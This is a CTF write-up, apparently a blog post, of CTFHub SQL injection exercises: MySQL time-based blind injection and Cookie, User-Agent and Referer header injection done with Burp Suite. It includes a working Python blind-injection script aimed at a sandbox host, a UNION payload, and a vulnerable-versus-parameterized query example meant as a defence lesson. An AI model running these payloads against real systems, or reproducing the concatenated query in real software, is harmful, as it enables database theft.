
CTFHub_Skill Tree_SQL Injection II

SQL Injection

MySQL Structure

Trying it out:

ctfhub_mysql_0

ctfhub_mysql_1

Trying to view the table names:

ctfhub_mysql_2

Trying to view the column names:

ctfhub_mysql_3

The result cannot be output directly:

ctfhub_mysql_4

Using a time-based injection script to extract the result:

ctfhub_mysql_5

import requests
import time

session = requests.session()
url = "http://challenge-8275a6b068ee702f.sandbox.ctfhub.com:10080/"
table = ""  # characters recovered so far

# Candidate characters: digits 0-9, then ASCII 97-125 (a-z and "{|}")
list_1 = [element for element in range(48,58)]
list_2 = [element for element in range(97,126)]
list_0 = list_1 + list_2

for i in range(1, 50):  # character position, 1-based as substr() expects
    print(i)
    for j in list_0:
        # payload = "1 and if(substr(database(),%d,1) ='%s',sleep(1),1)"%(i, chr(j))
        payload = "1 and if(substr((select ljvpqlbwbt from jwlaqmygfp),%d,1) = '%s',sleep(1),1)"%(i, chr(j))
        start_time = time.time()
        session.get(url=url + '?id=' + payload)
        end_time = time.time()
        t = end_time - start_time
        # A response slower than 1 second means sleep(1) ran, so the guess matched
        if t > 1:
            table += chr(j)
            print(table)
            break

Cookie Injection

Testing Cookie injection with Burp Suite:

ctfhub_cookie_1

ctfhub_cookie_2

ctfhub_cookie_3

UA Injection

Testing User-Agent injection with Burp Suite:

ctfhub_ua_0

View the table names:

ctfhub_ua_1

View the column names:

ctfhub_ua_2

View the flag:

ctfhub_ua_3

Refer Injection

Testing Referer injection with Burp Suite:

ctfhub_refer_1

View the table names:

ctfhub_refer_2

View the column names:

ctfhub_refer_3

View the flag:

ctfhub_refer_4
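
The Cookie, User-Agent and Referer challenges above all come down to the same server-side flaw: a request header value is pasted into the SQL text. The following is an added example, not code from the original post or from CTFHub, showing that flaw next to the parameterized fix. It uses an in-memory SQLite database instead of MySQL; the table names, the sample flag and the function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """Build a constructed sample database: one public table, one secret table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER, data TEXT);
        INSERT INTO news VALUES (1, 'ctfhub');
        CREATE TABLE secret(flag TEXT);
        INSERT INTO secret VALUES ('flag{constructed}');
    """)
    return db


def lookup_vulnerable(db, header_value):
    # The header text is concatenated into the statement, so whatever the
    # client sends in Cookie / User-Agent / Referer is parsed as SQL.
    sql = "SELECT id, data FROM news WHERE id = " + header_value
    return db.execute(sql).fetchall()


def lookup_safe(db, header_value):
    # 1) Validate the expected shape (an ASCII integer id).
    if not (header_value.isascii() and header_value.isdigit()):
        return []
    # 2) Bind the value as a parameter; it can never change the statement.
    return db.execute(
        "SELECT id, data FROM news WHERE id = ?", (int(header_value),)
    ).fetchall()


# Constructed header values: a normal id and a tampered one.
NORMAL = "1"
TAMPERED = "-1 UNION SELECT 1, flag FROM secret"

if __name__ == "__main__":
    db = make_db()
    for value in (NORMAL, TAMPERED):
        print(repr(value))
        print("  concatenated :", lookup_vulnerable(db, value))
        print("  parameterized:", lookup_safe(db, value))
```

Headers deserve the same treatment as query-string parameters: Burp Suite and the script above show that every part of the request is under the client's control.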

posted @ 2020-03-21 15:55  chalan630